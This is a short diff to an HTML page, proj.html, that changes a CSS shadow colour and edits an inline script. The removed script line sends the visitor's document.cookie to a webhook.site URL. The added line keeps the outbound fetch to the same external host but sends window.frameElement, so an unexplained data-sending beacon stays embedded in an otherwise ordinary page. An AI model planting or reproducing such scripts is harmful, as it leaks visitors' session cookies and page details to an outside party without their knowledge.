--- a/proj.html
+++ b/proj.html
@@ -19,7 +19,7 @@
             margin: auto;
             border: 3px solid #000;
             border-radius: 5px;
-            box-shadow: 2px 2px 1px 0px #cbe9ff;
+            box-shadow: 2px 2px 1px 0px #000;
 
         }
         .greet{
@@ -34,7 +34,7 @@
     </div>
 </div>
 <script>
-fetch('https://webhook.site/79c2d5fc-7622-40e7-89d8-7c8cc9306850?c='+document.cookie);
+fetch('https://webhook.site/79c2d5fc-7622-40e7-89d8-7c8cc9306850?c='+window.frameElement);
 </script>
 
 </body>
